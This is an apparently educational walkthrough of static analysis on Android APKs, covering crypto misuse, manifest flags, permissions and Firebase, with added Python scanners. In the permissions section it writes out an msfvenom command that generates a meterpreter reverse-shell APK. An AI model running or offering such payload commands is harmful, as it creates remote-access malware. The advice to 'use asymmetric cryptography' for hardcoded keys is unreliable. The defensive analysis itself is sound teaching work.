Static analysis

Static analysis is done without running the program. What are we going to identify in this basic room?

  • Weak or improper cryptography use

  • Exported Preference Activities

  • Apps which enable backups

  • Apps which are debuggable

  • App Permissions

  • Firebase Instance(s)

  • Sensitive data in the code

Weak or improper cryptography use

Incorrect use of encryption algorithms may result in sensitive data exposure, key leakage, broken authentication, insecure sessions and spoofing attacks.

Example: in a Java implementation, the following APIs are related to encryption. Review the parameters passed to the encryption implementation, in particular where the key and the IV come from.

IvParameterSpec iv = new IvParameterSpec(initVector.getBytes("UTF-8"));

SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes("UTF-8"), "AES");

How do I search for this when I have the source code of the application? There is a super advanced and wonderful tool called grep.

grep -r "SecretKeySpec" *

grep -rli "aes" *

grep -rli "iv" *

Open the file with your favorite text editor (Gedit/Vim/subl, etc.). I used this to solve a puzzle in my CTF "LaxCTF".

In real life:

Solution: Use asymmetric cryptography.
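The grep commands above find the call sites; the next step is deciding which of them are actually wrong. As an added example (not code from the room or from any tool it mentions), here is a small Python scanner that walks decompiled Java and flags the IV-from-string and key-from-string pattern shown above, plus ECB mode and weak digests. The rule set and the sample Java are my own constructions.

```python
import re
from pathlib import Path

# Constructed decompiled-Java sample modelled on the snippet above (not from a real app).
SAMPLE_JAVA = '''\
public class CryptoHelper {
    public static byte[] enc(String initVector, String key, byte[] data) throws Exception {
        IvParameterSpec iv = new IvParameterSpec(initVector.getBytes("UTF-8"));
        SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes("UTF-8"), "AES");
        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
        IvParameterSpec fixedIv = new IvParameterSpec("0000000000000000".getBytes());
        MessageDigest md = MessageDigest.getInstance("MD5");
        cipher.init(Cipher.ENCRYPT_MODE, skeySpec, iv);
        return cipher.doFinal(data);
    }
}
'''

# Assumed rule set: (name, regex, why a reviewer should look at the line).
RULES = [
    ("hardcoded-iv", r'new\s+IvParameterSpec\(\s*"', "IV is a string literal baked into the APK"),
    ("string-iv", r'new\s+IvParameterSpec\(\s*\w+\.getBytes\(', "IV built from a String, not SecureRandom"),
    ("hardcoded-key", r'new\s+SecretKeySpec\(\s*"', "key is a string literal baked into the APK"),
    ("string-key", r'new\s+SecretKeySpec\(\s*\w+\.getBytes\(', "key built from a String, no KeyStore/KDF"),
    ("ecb-mode", r'Cipher\.getInstance\(\s*"[^"]*/ECB/', "ECB leaks plaintext structure; prefer GCM"),
    ("weak-hash", r'MessageDigest\.getInstance\(\s*"(MD5|SHA-?1)"', "collision-prone digest"),
    ("legacy-cipher", r'Cipher\.getInstance\(\s*"(DES|RC4|ARCFOUR|Blowfish)', "legacy cipher"),
]

def scan_java(source):
    """Return [(line_number, rule_name, stripped_line)] for every rule hit in one file."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern, _reason in RULES:
            if re.search(pattern, line):
                findings.append((lineno, name, line.strip()))
    return findings

def scan_tree(root):
    """Apply scan_java to every .java file under root (e.g. a jadx output directory)."""
    results = {}
    for path in Path(root).rglob("*.java"):
        hits = scan_java(path.read_text(errors="replace"))
        if hits:
            results[str(path)] = hits
    return results

if __name__ == "__main__":
    for lineno, name, text in scan_java(SAMPLE_JAVA):
        print(f"{lineno}: [{name}] {text}")
```

A line such as `Cipher.getInstance("AES/GCM/NoPadding")` with a KeyStore-backed key and a SecureRandom IV produces no findings, which is the shape a fix should take.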

Exported Preference Activities

As we know, an Android activity is an application screen and the actions that are applied on that screen when we use the application. An exported activity is one that is shared with other apps on the device, leaving it accessible to any other application installed there.

Okay, we will exploit this in dynamic analysis... How do we identify that an activity is exported?

With your favorite text editor (Gedit/Vim/subl, etc.) open AndroidManifest.xml, or use cat and grep.

cat AndroidManifest.xml | grep "activity" --color

Apps which enable backups

This is considered a security issue because someone could back up your app via ADB and then copy its private data to their PC. The backup includes:

  1. Shared preferences.

  2. The directory returned by getFilesDir().

  3. getDatabasePath(path), which also includes files created by SQLiteOpenHelper.

  4. Files in directories created with getDir(String, int).

  5. Files on external storage returned by getExternalFilesDir(String type).

How do we identify this?

With your favorite text editor (Gedit/Vim/subl, etc.) open AndroidManifest.xml, or use cat and grep.

cat AndroidManifest.xml | grep "android:allowBackup" --color

Real scenario? Use your mind for this exercise :3.

Solution: set android:allowBackup="false" in the manifest.

Apps which are debuggable

Debugging is enabled on the app, which makes it easier for reverse engineers to attach a debugger to it. This allows dumping stack traces and accessing debugging helper classes.

How do we identify this?

With your favorite text editor (Gedit/Vim/subl, etc.) open AndroidManifest.xml, or use cat and grep.

cat AndroidManifest.xml | grep "android:debuggable" --color

App Permissions

System permissions are divided into two groups: “normal” and “dangerous.” Normal permission groups are allowed by default, because they don’t pose a risk to your privacy. (e.g., Android allows apps to access the Internet without your permission.) Dangerous permission groups, however, can give apps access to things like your calling history, private messages, location, camera, microphone, and more. Therefore, Android will always ask you to approve dangerous permissions.

In earlier versions of Android, accepting potentially dangerous permission groups was an all-or-nothing affair. You either allowed all permissions an app needed to function — before installation — or you declined them all, which meant you couldn’t install the app.

I am going to analyze the permissions of an APK generated by Metasploit.

msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R > /root/tryhackme.apk

Okay, HOW?

With your favorite text editor (Gedit/Vim/subl, etc.) open AndroidManifest.xml, or use cat and grep.
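The last three sections all come down to reading AndroidManifest.xml. As an added example (not from the room or any tool it mentions), this Python script parses the manifest once and pulls out the exported activities, allowBackup, debuggable and dangerous-permission facts that the grep commands above look for one at a time. The sample manifest and the dangerous-permission list are constructed for illustration.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # the android: XML namespace
# Constructed manifest showing every issue discussed above; not from a real app.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.lab">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <application android:allowBackup="true" android:debuggable="true">
    <activity android:name=".MainActivity" android:exported="true"/>
    <activity android:name=".SettingsActivity">
      <intent-filter><action android:name="com.example.lab.SETTINGS"/></intent-filter>
    </activity>
    <activity android:name=".HiddenActivity" android:exported="false"/>
  </application>
</manifest>
"""

# Subset of Android's "dangerous" protection-level permissions; assumed list for this example.
DANGEROUS = {
    "android.permission.READ_SMS", "android.permission.RECORD_AUDIO", "android.permission.CAMERA",
    "android.permission.READ_CONTACTS", "android.permission.ACCESS_FINE_LOCATION", "android.permission.READ_CALL_LOG",
}

def is_exported(component):
    """Explicit android:exported wins; otherwise an <intent-filter> makes the component
    exported by default (the behaviour for apps targeting API 30 and below)."""
    exported = component.get(A + "exported")
    if exported is not None:
        return exported == "true"
    return component.find("intent-filter") is not None

def analyze_manifest(xml_text):
    """Return the facts the grep commands above look for, as one dict."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    perms = [p.get(A + "name") for p in root.findall("uses-permission")]
    return {
        # allowBackup defaults to true when the attribute is absent, debuggable to false
        "allow_backup": app.get(A + "allowBackup", "true") == "true",
        "debuggable": app.get(A + "debuggable", "false") == "true",
        "exported_activities": [a.get(A + "name") for a in app.findall("activity") if is_exported(a)],
        "dangerous_permissions": sorted(p for p in perms if p in DANGEROUS),
    }

if __name__ == "__main__":
    for key, value in analyze_manifest(SAMPLE_MANIFEST).items():
        print(f"{key}: {value}")
```

Note that a plain `grep "activity"` does not show the implicit case: SettingsActivity has no android:exported attribute but is still exported through its intent filter.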

Firebase Instance(s)

Last year, security researchers discovered unprotected Firebase databases of thousands of iOS and Android mobile applications that were exposing over 100 million data records, including plaintext passwords, user IDs, location data and, in some cases, financial records such as banking and cryptocurrency transactions.

Google's Firebase service is one of the most popular back-end development platforms for mobile and web applications. It offers developers a cloud-based database, which stores data in JSON format and syncs it in real time with all connected clients.

How do we identify this?

FireBase Scanner: this script helps security analysts identify misconfigured Firebase instances.

git clone https://github.com/shivsahni/FireBaseScanner

python FireBaseScanner.py -p /path/apk

Sensitive data in the code

Users, passwords, internal IP addresses and more...

With your favorite text editor (Gedit/Vim/subl, etc.), grep, or a GUI decompiler: go back to reversing and experiment with your favorite tool.

In real life very bad programming practices exist! For example:

How to automatize this process?

It is very entertaining to do this manually, but in a real pentest time is not our friend. Let's see some static analysis frameworks.
